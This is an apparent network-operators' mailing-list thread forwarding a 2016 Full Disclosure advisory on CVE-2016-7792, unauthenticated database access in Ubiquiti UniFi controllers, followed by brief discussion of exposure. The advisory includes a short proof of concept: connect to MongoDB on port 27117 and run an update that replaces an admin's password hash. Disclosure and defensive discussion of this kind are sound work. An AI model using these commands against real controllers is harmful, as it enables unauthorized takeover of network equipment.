Well, this could be pretty crappy if you had a MSP and did layer3 provisioning like many do and your unifi server wasnt behind a firewall.
Connecting to the controller via layer3 is important, connecting to the db directly sounds dangerous. I am curious why this port is left open? Will have to scan my 5.4.x instances now. On Oct 3, 2016 4:55 AM, "Adam Moffett" <dmmoff...@gmail.com> wrote: > People do all kinds of things for all kinds of (dumb) reasons. > > The controller's db would not be accessible on the internet, but any wifi > user might be able to do the exploit unless you take measures to prevent it. > > > ------ Original Message ------ > From: "Paul Stewart" <p...@paulstewart.org> > To: "Animal Farm" <af@afmug.com> > Sent: 10/3/2016 4:10:28 AM > Subject: [AFMUG] Fwd: [FD] Critical Vulnerability in Ubiquiti UniFi > > > Don’t have time to test this out but thought I’d pass this along …. > > My first thought is why anyone would have their ports exposed across the > internet to allow this to happen, if it’s possibly true…. > > Paul > > > Begin forwarded message: > > *From: *Tim Schughart <t.schugh...@prosec-networks.com> > *Subject: **[FD] Critical Vulnerability in Ubiquiti UniFi* > *Date: *September 30, 2016 at 5:49:26 AM EDT > *To: *fulldisclos...@seclists.org, bugt...@securityfocus.com, > webapp...@securityfocus.com > *Cc: *"Khanh Quoc. Pham" <k.p...@prosec-networks.com> > > Hello @all, > > together with my colleague we found two uncritical vulnerabilities you'll > find below. > > Product: UniFi AP AC Lite > Vendor: Ubiquiti Networks Inc. > > Internal reference: ? (Bug ID) > Vulnerability type: Incorrect access control > Vulnerable version: Unify 5.2.7 and possible other versions affected (not > tested) > Vulnerable component: Database > Report confidence: yes > Solution status: Not fixed by Vendor, the bug is a feature. > Fixed versions: - > Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec > Networks > Solution date: - > Public disclosure: 2016-09-30 > CVE reference: CVE-2016-7792 > CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H > > > Vulnerability Details: > You are able to connect to the access points database, because of an > broken authentication (OWASP TOP10). So you are able to modify the database > and read the data. An possible scenario you'll find in PoC section. > > Risk: > An attacker gets access to the database and for e.g. is able to change the > admins password, like you see in PoC below. > > PoC: > 1. Generate SHA512 Hash with e.g. > mkpasswd -m sha-512 > > 2. Connect via network to database, e.g. : > mongo --port 27117 --host target_ip > > 3. Change password via command > "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": > "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t. > nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})" > 4. Login via web interface with new password > > > Best regards / Mit freundlichen Grüßen > > > Tim Schughart > CEO / Geschäftsführer > > -- > ProSec Networks e.K. > Ellingshohl 82 > 56077 Koblenz > > Website: https://www.prosec-networks.com > E-Mail: t.schugh...@prosec.networks.com > Mobile: +49 (0)157 7901 5826 > Phone: +49 (0)261 450 930 90 > > "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or > LEGALLY PROTECTED information and is intended only for the named > recipient(s). Any unauthorized use, dissemination, copying or forwarding is > strictly prohibited. If you are not the intended recipient and have > received this email communication in error, please notify the sender > immediately, delete it and destroy all copies of this E-Mail. VAT ID: > DE290654714 legal domicile Koblenz, HRA 21625.“ > > "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS > UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist > ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte > Nutzung, Weitergabe, Vervielfältigung oder Versendung ist strengstens > verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail > Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den > Absender, löschen diese E-Mail und vernichten alle Kopien. USt-IdNr.: > DE290654714, Amtsgericht Koblenz, HRA 21625." > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > > >